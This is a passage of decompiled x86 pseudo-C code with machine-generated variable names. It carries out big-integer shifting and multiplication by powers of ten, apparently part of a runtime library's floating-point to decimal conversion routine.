                            													_t971 =  *((intOrPtr*)(_t1276 + _t1179 - 0x570));
                            													__eflags = _t971 -  *((intOrPtr*)(_t1276 + _t1179 - 0x1d0));
                            													if(_t971 !=  *((intOrPtr*)(_t1276 + _t1179 - 0x1d0))) {
                            														goto L101;
                            													}
                            													_t1179 = _t1179 + 4;
                            													__eflags = _t1179 - 8;
                            													if(_t1179 != 8) {
                            														continue;
                            													} else {
                            														_t166 =  &_v1896;
                            														 *_t166 = _v1896 & 0x00000000;
                            														__eflags =  *_t166;
                            														asm("bsr eax, edi");
                            														if( *_t166 == 0) {
                            															_t1180 = 0;
                            															__eflags = 0;
                            														} else {
                            															_t1180 = _t971 + 1;
                            														}
                            														_t972 = 0x20;
                            														_t1265 = _t1114;
                            														__eflags = _t972 - _t1180 - _t1114;
                            														_t974 =  &_v460;
                            														_v1880 = _t974;
                            														_t1224 = _t974;
                            														_t171 =  &_v1865;
                            														 *_t171 = _t972 - _t1180 - _t1114 > 0;
                            														__eflags =  *_t171;
                            														while(1) {
                            															__eflags = _t1265 - _t1058;
                            															if(_t1265 >= _t1058) {
                            																_t173 =  &_v1876;
                            																 *_t173 = _v1876 & 0x00000000;
                            																__eflags =  *_t173;
                            															} else {
                            																_v1876 =  *_t1224;
                            															}
                            															_t175 = _t1265 - 1; // 0x0
                            															__eflags = _t175 - _t1058;
                            															if(_t175 >= _t1058) {
                            																_t1181 = 0;
                            																__eflags = 0;
                            															} else {
                            																_t1181 =  *(_t1224 - 4);
                            															}
                            															_t1224 = _t1224 - 4;
                            															_t978 = _v1880;
                            															_t1265 = _t1265 - 1;
                            															 *_t978 = _t1181 >> 0x0000001e ^ _v1876 << 0x00000002;
                            															_v1880 = _t978 - 4;
                            															__eflags = _t1265 - 0xffffffff;
                            															if(_t1265 == 0xffffffff) {
                            																break;
                            															}
                            															_t1058 = _v472;
                            														}
                            														__eflags = _v1865;
                            														_t1115 = _t1114 - _v1872;
                            														_v472 = (0 | _v1865 != 0x00000000) + _t1114;
                            														_t1226 = _t1115 >> 5;
                            														_v1884 = _t1115;
                            														_t1267 = _t1226 << 2;
                            														E01318520(_t1226,  &_v1396, 0, _t1267);
                            														 *(_t1276 + _t1267 - 0x570) = 1 << (_v1884 & 0x0000001f);
                            														_t802 = _t1226 + 1;
                            													}
                            													goto L128;
                            												}
                            											}
                            											goto L101;
                            										}
                            										L128:
                            										_v1400 = _t802;
                            										_t1061 = 0x1cc;
                            										_v936 = _t802;
                            										__eflags = _t802 << 2;
                            										E01319BDB( &_v932, 0x1cc,  &_v1396, _t802 << 2);
                            										_t1282 =  &(_t1278[7]);
                            									} else {
                            										_v1396 = _v1396 & 0x00000000;
                            										_t1268 = 2;
                            										_v1392 = 0x100000;
                            										_v1400 = _t1268;
                            										__eflags = _t1058 - _t1268;
                            										if(_t1058 != _t1268) {
                            											L53:
                            											_t989 = _v1872 + 1;
                            											_t990 = _t989 & 0x0000001f;
                            											_t1118 = 0x20;
                            											_v1876 = _t990;
                            											_t1228 = _t989 >> 5;
                            											_v1872 = _t1228;
                            											_v1908 = _t1118 - _t990;
                            											_t993 = E0132F280(1, _t1118 - _t990, 0);
                            											_t1120 =  *((intOrPtr*)(_t1276 + _t1058 * 4 - 0x1d4));
                            											_t994 = _t993 - 1;
                            											_t108 =  &_v1896;
                            											 *_t108 = _v1896 & 0x00000000;
                            											__eflags =  *_t108;
                            											asm("bsr ecx, ecx");
                            											_v1884 = _t994;
                            											_v1912 =  !_t994;
                            											if( *_t108 == 0) {
                            												_t1121 = 0;
                            												__eflags = 0;
                            											} else {
                            												_t1121 = _t1120 + 1;
                            											}
                            											_t996 = 0x20;
                            											_t997 = _t996 - _t1121;
                            											_t1186 = _t1058 + _t1228;
                            											__eflags = _v1876 - _t997;
                            											_v1892 = _t1186;
                            											_t998 = _t997 & 0xffffff00 | _v1876 - _t997 > 0x00000000;
                            											__eflags = _t1186 - 0x73;
                            											_v1865 = _t998;
                            											_t1122 = _t1121 & 0xffffff00 | _t1186 - 0x00000073 > 0x00000000;
                            											__eflags = _t1186 - 0x73;
                            											if(_t1186 != 0x73) {
                            												L59:
                            												_t999 = 0;
                            												__eflags = 0;
                            											} else {
                            												__eflags = _t998;
                            												if(_t998 == 0) {
                            													goto L59;
                            												} else {
                            													_t999 = 1;
                            												}
                            											}
                            											__eflags = _t1122;
                            											if(_t1122 != 0) {
                            												L81:
                            												__eflags = 0;
                            												_t1061 = 0x1cc;
                            												_v1400 = 0;
                            												_v472 = 0;
                            												E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
                            												_t1278 =  &(_t1278[4]);
                            											} else {
                            												__eflags = _t999;
                            												if(_t999 != 0) {
                            													goto L81;
                            												} else {
                            													_t1123 = 0x72;
                            													__eflags = _t1186 - _t1123;
                            													if(_t1186 >= _t1123) {
                            														_t1186 = _t1123;
                            														_v1892 = _t1123;
                            													}
                            													_t1009 = _t1186;
                            													_v1880 = _t1009;
                            													__eflags = _t1186 - 0xffffffff;
                            													if(_t1186 != 0xffffffff) {
                            														_t1187 = _v1872;
                            														_t1270 = _t1186 - _t1187;
                            														__eflags = _t1270;
                            														_t1127 =  &_v468 + _t1270 * 4;
                            														_v1888 = _t1127;
                            														while(1) {
                            															__eflags = _t1009 - _t1187;
                            															if(_t1009 < _t1187) {
                            																break;
                            															}
                            															__eflags = _t1270 - _t1058;
                            															if(_t1270 >= _t1058) {
                            																_t1231 = 0;
                            																__eflags = 0;
                            															} else {
                            																_t1231 =  *_t1127;
                            															}
                            															__eflags = _t1270 - 1 - _t1058;
                            															if(_t1270 - 1 >= _t1058) {
                            																_t1014 = 0;
                            																__eflags = 0;
                            															} else {
                            																_t1014 =  *(_t1127 - 4);
                            															}
                            															_t1017 = _v1880;
                            															_t1127 = _v1888 - 4;
                            															_v1888 = _t1127;
                            															 *(_t1276 + _t1017 * 4 - 0x1d0) = (_t1231 & _v1884) << _v1876 | (_t1014 & _v1912) >> _v1908;
                            															_t1009 = _t1017 - 1;
                            															_t1270 = _t1270 - 1;
                            															_v1880 = _t1009;
                            															__eflags = _t1009 - 0xffffffff;
                            															if(_t1009 != 0xffffffff) {
                            																_t1058 = _v472;
                            																continue;
                            															}
                            															break;
                            														}
                            														_t1186 = _v1892;
                            														_t1228 = _v1872;
                            														_t1268 = 2;
                            													}
                            													__eflags = _t1228;
                            													if(_t1228 != 0) {
                            														__eflags = 0;
                            														memset( &_v468, 0, _t1228 << 2);
                            														_t1278 =  &(_t1278[3]);
                            													}
                            													__eflags = _v1865;
                            													_t1061 = 0x1cc;
                            													if(_v1865 == 0) {
                            														_v472 = _t1186;
                            													} else {
                            														_v472 = _t1186 + 1;
                            													}
                            												}
                            											}
                            											_v1392 = _v1392 & 0x00000000;
                            											_v1396 = _t1268;
                            											_v1400 = 1;
                            											_v936 = 1;
                            											_push(4);
                            										} else {
                            											_t1131 = 0;
                            											__eflags = 0;
                            											while(1) {
                            												__eflags =  *((intOrPtr*)(_t1276 + _t1131 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1131 - 0x1d0));
                            												if( *((intOrPtr*)(_t1276 + _t1131 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1131 - 0x1d0))) {
                            													goto L53;
                            												}
                            												_t1131 = _t1131 + 4;
                            												__eflags = _t1131 - 8;
                            												if(_t1131 != 8) {
                            													continue;
                            												} else {
                            													_t1020 = _v1872 + 2;
                            													_t1021 = _t1020 & 0x0000001f;
                            													_t1132 = 0x20;
                            													_t1133 = _t1132 - _t1021;
                            													_v1888 = _t1021;
                            													_t1272 = _t1020 >> 5;
                            													_v1876 = _t1272;
                            													_v1908 = _t1133;
                            													_t1024 = E0132F280(1, _t1133, 0);
                            													_v1896 = _v1896 & 0x00000000;
                            													_t1025 = _t1024 - 1;
                            													__eflags = _t1025;
                            													asm("bsr ecx, edi");
                            													_v1884 = _t1025;
                            													_v1912 =  !_t1025;
                            													if(_t1025 == 0) {
                            														_t1134 = 0;
                            														__eflags = 0;
                            													} else {
                            														_t1134 = _t1133 + 1;
                            													}
                            													_t1027 = 0x20;
                            													_t1028 = _t1027 - _t1134;
                            													_t1189 = _t1272 + 2;
                            													__eflags = _v1888 - _t1028;
                            													_v1880 = _t1189;
                            													_t1029 = _t1028 & 0xffffff00 | _v1888 - _t1028 > 0x00000000;
                            													__eflags = _t1189 - 0x73;
                            													_v1865 = _t1029;
                            													_t1135 = _t1134 & 0xffffff00 | _t1189 - 0x00000073 > 0x00000000;
                            													__eflags = _t1189 - 0x73;
                            													if(_t1189 != 0x73) {
                            														L28:
                            														_t1030 = 0;
                            														__eflags = 0;
                            													} else {
                            														__eflags = _t1029;
                            														if(_t1029 == 0) {
                            															goto L28;
                            														} else {
                            															_t1030 = 1;
                            														}
                            													}
                            													__eflags = _t1135;
                            													if(_t1135 != 0) {
                            														L50:
                            														__eflags = 0;
                            														_t1061 = 0x1cc;
                            														_v1400 = 0;
                            														_v472 = 0;
                            														E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
                            														_t1278 =  &(_t1278[4]);
                            													} else {
                            														__eflags = _t1030;
                            														if(_t1030 != 0) {
                            															goto L50;
                            														} else {
                            															_t1138 = 0x72;
                            															__eflags = _t1189 - _t1138;
                            															if(_t1189 >= _t1138) {
                            																_t1189 = _t1138;
                            																_v1880 = _t1138;
                            															}
                            															_t1139 = _t1189;
                            															_v1892 = _t1139;
                            															__eflags = _t1189 - 0xffffffff;
                            															if(_t1189 != 0xffffffff) {
                            																_t1190 = _v1876;
                            																_t1274 = _t1189 - _t1190;
                            																__eflags = _t1274;
                            																_t1040 =  &_v468 + _t1274 * 4;
                            																_v1872 = _t1040;
                            																while(1) {
                            																	__eflags = _t1139 - _t1190;
                            																	if(_t1139 < _t1190) {
                            																		break;
                            																	}
                            																	__eflags = _t1274 - _t1058;
                            																	if(_t1274 >= _t1058) {
                            																		_t1237 = 0;
                            																		__eflags = 0;
                            																	} else {
                            																		_t1237 =  *_t1040;
                            																	}
                            																	__eflags = _t1274 - 1 - _t1058;
                            																	if(_t1274 - 1 >= _t1058) {
                            																		_t1042 = 0;
                            																		__eflags = 0;
                            																	} else {
                            																		_t1042 =  *(_v1872 - 4);
                            																	}
                            																	_t1144 = _v1892;
                            																	 *(_t1276 + _t1144 * 4 - 0x1d0) = (_t1042 & _v1912) >> _v1908 | (_t1237 & _v1884) << _v1888;
                            																	_t1139 = _t1144 - 1;
                            																	_t1274 = _t1274 - 1;
                            																	_t1040 = _v1872 - 4;
                            																	_v1892 = _t1139;
                            																	_v1872 = _t1040;
                            																	__eflags = _t1139 - 0xffffffff;
                            																	if(_t1139 != 0xffffffff) {
                            																		_t1058 = _v472;
                            																		continue;
                            																	}
                            																	break;
                            																}
                            																_t1189 = _v1880;
                            																_t1272 = _v1876;
                            															}
                            															__eflags = _t1272;
                            															if(_t1272 != 0) {
                            																__eflags = 0;
                            																memset( &_v468, 0, _t1272 << 2);
                            																_t1278 =  &(_t1278[3]);
                            															}
                            															__eflags = _v1865;
                            															_t1061 = 0x1cc;
                            															if(_v1865 == 0) {
                            																_v472 = _t1189;
                            															} else {
                            																_v472 = _t1189 + 1;
                            															}
                            														}
                            													}
                            													_v1392 = _v1392 & 0x00000000;
                            													_t1035 = 4;
                            													__eflags = 1;
                            													_v1396 = _t1035;
                            													_v1400 = 1;
                            													_v936 = 1;
                            													_push(_t1035);
                            												}
                            												goto L52;
                            											}
                            											goto L53;
                            										}
                            										L52:
                            										_push( &_v1396);
                            										_push(_t1061);
                            										_push( &_v932);
                            										E01319BDB();
                            										_t1282 =  &(_t1278[4]);
                            									}
                            									_t807 = _v1904;
                            									_t1088 = 0xa;
                            									_v1912 = _t1088;
                            									__eflags = _t807;
                            									if(_t807 < 0) {
                            										_t808 =  ~_t807;
                            										_t809 = _t808 / _t1088;
                            										_v1880 = _t809;
                            										_t1089 = _t808 % _t1088;
                            										_v1884 = _t1089;
                            										__eflags = _t809;
                            										if(_t809 == 0) {
                            											L249:
                            											__eflags = _t1089;
                            											if(_t1089 != 0) {
                            												_t846 =  *(0x13393c4 + _t1089 * 4);
                            												_v1896 = _t846;
                            												__eflags = _t846;
                            												if(_t846 == 0) {
                            													L260:
                            													__eflags = 0;
                            													_push(0);
                            													_v472 = 0;
                            													_v2408 = 0;
                            													goto L261;
                            												} else {
                            													__eflags = _t846 - 1;
                            													if(_t846 != 1) {
                            														_t1100 = _v472;
                            														__eflags = _t1100;
                            														if(_t1100 != 0) {
                            															_t1206 = 0;
                            															_t1254 = 0;
                            															__eflags = 0;
                            															do {
                            																_t1160 = _t846 *  *(_t1276 + _t1254 * 4 - 0x1d0) >> 0x20;
                            																 *(_t1276 + _t1254 * 4 - 0x1d0) = _t846 *  *(_t1276 + _t1254 * 4 - 0x1d0) + _t1206;
                            																_t846 = _v1896;
                            																asm("adc edx, 0x0");
                            																_t1254 = _t1254 + 1;
                            																_t1206 = _t1160;
                            																__eflags = _t1254 - _t1100;
                            															} while (_t1254 != _t1100);
                            															__eflags = _t1206;
                            															if(_t1206 != 0) {
                            																_t853 = _v472;
                            																__eflags = _t853 - 0x73;
                            																if(_t853 >= 0x73) {
                            																	goto L260;
                            																} else {
                            																	 *(_t1276 + _t853 * 4 - 0x1d0) = _t1206;
                            																	_v472 = _v472 + 1;
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										} else {
                            											do {
                            												__eflags = _t809 - 0x26;
                            												if(_t809 > 0x26) {
                            													_t809 = 0x26;
                            												}
                            												_t1101 =  *(0x133932e + _t809 * 4) & 0x000000ff;
                            												_v1872 = _t809;
                            												_v1400 = ( *(0x133932e + _t809 * 4) & 0x000000ff) + ( *(0x133932f + _t809 * 4) & 0x000000ff);
                            												E01318520(_t1101 << 2,  &_v1396, 0, _t1101 << 2);
                            												_t864 = E013189A0( &(( &_v1396)[_t1101]), 0x1338a28 + ( *(0x133932c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x133932f + _t809 * 4) & 0x000000ff) << 2);
                            												_t1102 = _v1400;
                            												_t1282 =  &(_t1282[6]);
                            												_v1892 = _t1102;
                            												__eflags = _t1102 - 1;
                            												if(_t1102 > 1) {
                            													__eflags = _v472 - 1;
                            													if(_v472 > 1) {
                            														__eflags = _t1102 - _v472;
                            														_t1209 =  &_v1396;
                            														_t865 = _t864 & 0xffffff00 | _t1102 - _v472 > 0x00000000;
                            														__eflags = _t865;
                            														if(_t865 != 0) {
                            															_t1161 =  &_v468;
                            														} else {
                            															_t1209 =  &_v468;
                            															_t1161 =  &_v1396;
                            														}
                            														_v1908 = _t1161;
                            														__eflags = _t865;
                            														if(_t865 == 0) {
                            															_t1102 = _v472;
                            														}
                            														_v1876 = _t1102;
                            														__eflags = _t865;
                            														if(_t865 != 0) {
                            															_v1892 = _v472;
                            														}
                            														_t1162 = 0;
                            														_t1256 = 0;
                            														_v1864 = 0;
                            														__eflags = _t1102;
                            														if(_t1102 == 0) {
                            															L243:
                            															_v472 = _t1162;
                            															_t867 = _t1162 << 2;
                            															__eflags = _t867;
                            															_push(_t867);
                            															_t868 =  &_v1860;
                            															goto L244;
                            														} else {
                            															_t1210 = _t1209 -  &_v1860;
                            															__eflags = _t1210;
                            															_v1928 = _t1210;
                            															do {
                            																_t875 =  *(_t1276 + _t1210 + _t1256 * 4 - 0x740);
                            																_v1896 = _t875;
                            																__eflags = _t875;
                            																if(_t875 != 0) {
                            																	_t876 = 0;
                            																	_t1211 = 0;
                            																	_t1103 = _t1256;
                            																	_v1888 = 0;
                            																	__eflags = _v1892;
                            																	if(_v1892 == 0) {
                            																		L240:
                            																		__eflags = _t1103 - 0x73;
                            																		if(_t1103 == 0x73) {
                            																			goto L258;
                            																		} else {
                            																			_t1210 = _v1928;
                            																			_t1102 = _v1876;
                            																			goto L242;
                            																		}
                            																	} else {
                            																		while(1) {
                            																			__eflags = _t1103 - 0x73;
                            																			if(_t1103 == 0x73) {
                            																				goto L235;
                            																			}
                            																			__eflags = _t1103 - _t1162;
                            																			if(_t1103 == _t1162) {
                            																				 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) & 0x00000000;
                            																				_t888 = _t876 + 1 + _t1256;
                            																				__eflags = _t888;
                            																				_v1864 = _t888;
                            																				_t876 = _v1888;
                            																			}
                            																			_t883 =  *(_v1908 + _t876 * 4);
                            																			asm("adc edx, 0x0");
                            																			 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) + _t883 * _v1896 + _t1211;
                            																			asm("adc edx, 0x0");
                            																			_t876 = _v1888 + 1;
                            																			_t1103 = _t1103 + 1;
                            																			_v1888 = _t876;
                            																			_t1211 = _t883 * _v1896 >> 0x20;
                            																			_t1162 = _v1864;
                            																			__eflags = _t876 - _v1892;
                            																			if(_t876 != _v1892) {
                            																				continue;
                            																			} else {
                            																				goto L235;
                            																			}
                            																			while(1) {
                            																				L235:
                            																				__eflags = _t1211;
                            																				if(_t1211 == 0) {
                            																					goto L240;
                            																				}
                            																				__eflags = _t1103 - 0x73;
                            																				if(_t1103 == 0x73) {
                            																					goto L258;
                            																				} else {
                            																					__eflags = _t1103 - _t1162;
                            																					if(_t1103 == _t1162) {
                            																						_t558 = _t1276 + _t1103 * 4 - 0x740;
                            																						 *_t558 =  *(_t1276 + _t1103 * 4 - 0x740) & 0x00000000;
                            																						__eflags =  *_t558;
                            																						_t564 = _t1103 + 1; // 0x1
                            																						_v1864 = _t564;
                            																					}
                            																					_t881 = _t1211;
                            																					_t1211 = 0;
                            																					 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) + _t881;
                            																					_t1162 = _v1864;
                            																					asm("adc edi, edi");
                            																					_t1103 = _t1103 + 1;
                            																					continue;
                            																				}
                            																				goto L246;
                            																			}
                            																			goto L240;
                            																		}
                            																		goto L235;
                            																	}
                            																} else {
                            																	__eflags = _t1256 - _t1162;
                            																	if(_t1256 == _t1162) {
                            																		 *(_t1276 + _t1256 * 4 - 0x740) =  *(_t1276 + _t1256 * 4 - 0x740) & _t875;
                            																		_t526 = _t1256 + 1; // 0x1
                            																		_t1162 = _t526;
                            																		_v1864 = _t1162;
                            																	}
                            																	goto L242;
                            																}
                            																goto L246;
                            																L242:
                            																_t1256 = _t1256 + 1;
                            																__eflags = _t1256 - _t1102;
                            															} while (_t1256 != _t1102);
                            															goto L243;
                            														}
                            													} else {
                            														_t1212 = _v468;
                            														_v472 = _t1102;
                            														E01319BDB( &_v468, _t1061,  &_v1396, _t1102 << 2);
                            														_t1282 =  &(_t1282[4]);
                            														__eflags = _t1212;
                            														if(_t1212 == 0) {
                            															goto L203;
                            														} else {
                            															__eflags = _t1212 - 1;
                            															if(_t1212 == 1) {
                            																goto L245;
                            															} else {
                            																__eflags = _v472;
                            																if(_v472 == 0) {
                            																	goto L245;
                            																} else {
                            																	_t1104 = 0;
                            																	_v1896 = _v472;
                            																	_t1257 = 0;
                            																	__eflags = 0;
                            																	do {
                            																		_t897 = _t1212;
                            																		_t1163 = _t897 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
                            																		 *(_t1276 + _t1257 * 4 - 0x1d0) = _t897 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
                            																		asm("adc edx, 0x0");
                            																		_t1257 = _t1257 + 1;
                            																		_t1104 = _t1163;
                            																		__eflags = _t1257 - _v1896;
                            																	} while (_t1257 != _v1896);
                            																	goto L208;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													_t1213 = _v1396;
                            													__eflags = _t1213;
                            													if(_t1213 != 0) {
                            														__eflags = _t1213 - 1;
                            														if(_t1213 == 1) {
                            															goto L245;
                            														} else {
                            															__eflags = _v472;
                            															if(_v472 == 0) {
                            																goto L245;
                            															} else {
                            																_t1105 = 0;
                            																_v1896 = _v472;
                            																_t1258 = 0;
                            																__eflags = 0;
                            																do {
                            																	_t902 = _t1213;
                            																	_t1164 = _t902 *  *(_t1276 + _t1258 * 4 - 0x1d0) >> 0x20;
                            																	 *(_t1276 + _t1258 * 4 - 0x1d0) = _t902 *  *(_t1276 + _t1258 * 4 - 0x1d0) + _t1105;
                            																	asm("adc edx, 0x0");
                            																	_t1258 = _t1258 + 1;
                            																	_t1105 = _t1164;
                            																	__eflags = _t1258 - _v1896;
                            																} while (_t1258 != _v1896);
                            																L208:
                            																__eflags = _t1104;
                            																if(_t1104 == 0) {
                            																	goto L245;
                            																} else {
                            																	_t900 = _v472;
                            																	__eflags = _t900 - 0x73;
                            																	if(_t900 >= 0x73) {
                            																		L258:
                            																		_v2408 = 0;
                            																		_v472 = 0;
                            																		E01319BDB( &_v468, _t1061,  &_v2404, 0);
                            																		_t1282 =  &(_t1282[4]);
                            																		_t871 = 0;
                            																	} else {
                            																		 *(_t1276 + _t900 * 4 - 0x1d0) = _t1104;
                            																		_v472 = _v472 + 1;
                            																		goto L245;
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														L203:
                            														_v2408 = 0;
                            														_v472 = 0;
                            														_push(0);
                            														_t868 =  &_v2404;
                            														L244:
                            														_push(_t868);
                            														_push(_t1061);
                            														_push( &_v468);
                            														E01319BDB();
                            														_t1282 =  &(_t1282[4]);
                            														L245:
                            														_t871 = 1;
                            													}
                            												}
                            												L246:
                            												__eflags = _t871;
                            												if(_t871 == 0) {
                            													_v2408 = _v2408 & 0x00000000;
                            													_v472 = _v472 & 0x00000000;
                            													_push(0);
                            													L261:
                            													_push( &_v2404);
                            													_t849 =  &_v468;
                            													goto L262;
                            												} else {
                            													goto L247;
                            												}
                            												goto L263;
                            												L247:
                            												_t809 = _v1880 - _v1872;
                            												__eflags = _t809;
                            												_v1880 = _t809;
                            											} while (_t809 != 0);
                            											_t1089 = _v1884;
                            											goto L249;
                            										}
                            									} else {
                            										_t905 = _t807 / _t1088;
                            										_v1908 = _t905;
                            										_t1106 = _t807 % _t1088;
                            										_v1896 = _t1106;
                            										__eflags = _t905;
                            										if(_t905 == 0) {
                            											L184:
                            											__eflags = _t1106;
                            											if(_t1106 != 0) {
                            												_t1214 =  *(0x13393c4 + _t1106 * 4);
                            												__eflags = _t1214;
                            												if(_t1214 != 0) {
                            													__eflags = _t1214 - 1;
                            													if(_t1214 != 1) {
                            														_t906 = _v936;
                            														_v1896 = _t906;
                            														__eflags = _t906;
                            														if(_t906 != 0) {
                            															_t1259 = 0;
                            															_t1107 = 0;
                            															__eflags = 0;
                            															do {
                            																_t907 = _t1214;
                            																_t1168 = _t907 *  *(_t1276 + _t1107 * 4 - 0x3a0) >> 0x20;
                            																 *(_t1276 + _t1107 * 4 - 0x3a0) = _t907 *  *(_t1276 + _t1107 * 4 - 0x3a0) + _t1259;
                            																asm("adc edx, 0x0");
                            																_t1107 = _t1107 + 1;
                            																_t1259 = _t1168;
                            																__eflags = _t1107 - _v1896;
                            															} while (_t1107 != _v1896);
                            															__eflags = _t1259;
                            															if(_t1259 != 0) {
                            																_t910 = _v936;
                            																__eflags = _t910 - 0x73;
                            																if(_t910 >= 0x73) {
                            																	goto L186;
                            																} else {
                            																	 *(_t1276 + _t910 * 4 - 0x3a0) = _t1259;
                            																	_v936 = _v936 + 1;
                            																}
                            															}
                            														}
                            													}
                            												} else {
                            													L186:
                            													_v2408 = 0;
                            													_v936 = 0;
                            													_push(0);
                            													goto L190;
                            												}
                            											}
                            										} else {
                            											do {
                            												__eflags = _t905 - 0x26;
                            												if(_t905 > 0x26) {
                            													_t905 = 0x26;
                            												}
                            												_t1108 =  *(0x133932e + _t905 * 4) & 0x000000ff;
                            												_v1888 = _t905;
                            												_v1400 = ( *(0x133932e + _t905 * 4) & 0x000000ff) + ( *(0x133932f + _t905 * 4) & 0x000000ff);
                            												E01318520(_t1108 << 2,  &_v1396, 0, _t1108 << 2);
                            												_t923 = E013189A0( &(( &_v1396)[_t1108]), 0x1338a28 + ( *(0x133932c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x133932f + _t905 * 4) & 0x000000ff) << 2);
                            												_t1109 = _v1400;
                            												_t1282 =  &(_t1282[6]);
                            												_v1892 = _t1109;
                            												__eflags = _t1109 - 1;
                            												if(_t1109 > 1) {
                            													__eflags = _v936 - 1;
                            													if(_v936 > 1) {
                            														__eflags = _t1109 - _v936;
                            														_t1217 =  &_v1396;
                            														_t924 = _t923 & 0xffffff00 | _t1109 - _v936 > 0x00000000;
                            														__eflags = _t924;
                            														if(_t924 != 0) {
                            															_t1169 =  &_v932;
                            														} else {
                            															_t1217 =  &_v932;
                            															_t1169 =  &_v1396;
                            														}
                            														_v1876 = _t1169;
                            														__eflags = _t924;
                            														if(_t924 == 0) {
                            															_t1109 = _v936;
                            														}
                            														_v1880 = _t1109;
                            														__eflags = _t924;
                            														if(_t924 != 0) {
                            															_v1892 = _v936;
                            														}
                            														_t1170 = 0;
                            														_t1261 = 0;
                            														_v1864 = 0;
                            														__eflags = _t1109;
                            														if(_t1109 == 0) {
                            															L177:
                            															_v936 = _t1170;
                            															_t926 = _t1170 << 2;
                            															__eflags = _t926;
                            															goto L178;
                            														} else {
                            															_t1218 = _t1217 -  &_v1860;
                            															__eflags = _t1218;
                            															_v1928 = _t1218;
                            															do {
                            																_t934 =  *(_t1276 + _t1218 + _t1261 * 4 - 0x740);
                            																_v1884 = _t934;
                            																__eflags = _t934;
                            																if(_t934 != 0) {
                            																	_t935 = 0;
                            																	_t1219 = 0;
                            																	_t1110 = _t1261;
                            																	_v1872 = 0;
                            																	__eflags = _v1892;
                            																	if(_v1892 == 0) {
                            																		L174:
                            																		__eflags = _t1110 - 0x73;
                            																		if(_t1110 == 0x73) {
                            																			goto L187;
                            																		} else {
                            																			_t1218 = _v1928;
                            																			_t1109 = _v1880;
                            																			goto L176;
                            																		}
                            																	} else {
                            																		while(1) {
                            																			__eflags = _t1110 - 0x73;
                            																			if(_t1110 == 0x73) {
                            																				goto L169;
                            																			}
                            																			__eflags = _t1110 - _t1170;
                            																			if(_t1110 == _t1170) {
                            																				 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) & 0x00000000;
                            																				_t947 = _t935 + 1 + _t1261;
                            																				__eflags = _t947;
                            																				_v1864 = _t947;
                            																				_t935 = _v1872;
                            																			}
                            																			_t942 =  *(_v1876 + _t935 * 4);
                            																			asm("adc edx, 0x0");
                            																			 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) + _t942 * _v1884 + _t1219;
                            																			asm("adc edx, 0x0");
                            																			_t935 = _v1872 + 1;
                            																			_t1110 = _t1110 + 1;
                            																			_v1872 = _t935;
                            																			_t1219 = _t942 * _v1884 >> 0x20;
                            																			_t1170 = _v1864;
                            																			__eflags = _t935 - _v1892;
                            																			if(_t935 != _v1892) {
                            																				continue;
                            																			} else {
                            																				goto L169;
                            																			}
                            																			while(1) {
                            																				L169:
                            																				__eflags = _t1219;
                            																				if(_t1219 == 0) {
                            																					goto L174;
                            																				}
                            																				__eflags = _t1110 - 0x73;
                            																				if(_t1110 == 0x73) {
                            																					L187:
                            																					__eflags = 0;
                            																					_v2408 = 0;
                            																					_v936 = 0;
                            																					_push(0);
                            																					_t937 =  &_v2404;
                            																					goto L188;
                            																				} else {
                            																					__eflags = _t1110 - _t1170;
                            																					if(_t1110 == _t1170) {
                            																						_t370 = _t1276 + _t1110 * 4 - 0x740;
                            																						 *_t370 =  *(_t1276 + _t1110 * 4 - 0x740) & 0x00000000;
                            																						__eflags =  *_t370;
                            																						_t376 = _t1110 + 1; // 0x1
                            																						_v1864 = _t376;
                            																					}
                            																					_t940 = _t1219;
                            																					_t1219 = 0;
                            																					 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) + _t940;
                            																					_t1170 = _v1864;
                            																					asm("adc edi, edi");
                            																					_t1110 = _t1110 + 1;
                            																					continue;
                            																				}
                            																				goto L181;
                            																			}
                            																			goto L174;
                            																		}
                            																		goto L169;
                            																	}
                            																} else {
                            																	__eflags = _t1261 - _t1170;
                            																	if(_t1261 == _t1170) {
                            																		 *(_t1276 + _t1261 * 4 - 0x740) =  *(_t1276 + _t1261 * 4 - 0x740) & _t934;
                            																		_t338 = _t1261 + 1; // 0x1
                            																		_t1170 = _t338;
                            																		_v1864 = _t1170;
                            																	}
                            																	goto L176;
                            																}
                            																goto L181;
                            																L176:
                            																_t1261 = _t1261 + 1;
                            																__eflags = _t1261 - _t1109;
                            															} while (_t1261 != _t1109);
                            															goto L177;
                            														}
                            													} else {
                            														_t1220 = _v932;
                            														_v936 = _t1109;
                            														E01319BDB( &_v932, _t1061,  &_v1396, _t1109 << 2);
                            														_t1282 =  &(_t1282[4]);
                            														__eflags = _t1220;
                            														if(_t1220 != 0) {
                            															__eflags = _t1220 - 1;
                            															if(_t1220 == 1) {
                            																goto L180;
                            															} else {
                            																__eflags = _v936;
                            																if(_v936 == 0) {
                            																	goto L180;
                            																} else {
                            																	_t1111 = 0;
                            																	_v1884 = _v936;
                            																	_t1262 = 0;
                            																	__eflags = 0;
                            																	do {
                            																		_t955 = _t1220;
                            																		_t1171 = _t955 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
                            																		 *(_t1276 + _t1262 * 4 - 0x3a0) = _t955 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
                            																		asm("adc edx, 0x0");
                            																		_t1262 = _t1262 + 1;
                            																		_t1111 = _t1171;
                            																		__eflags = _t1262 - _v1884;
                            																	} while (_t1262 != _v1884);
                            																	goto L149;
                            																}
                            															}
                            														} else {
                            															_v1400 = 0;
                            															_v936 = 0;
                            															_push(0);
                            															_t927 =  &_v1396;
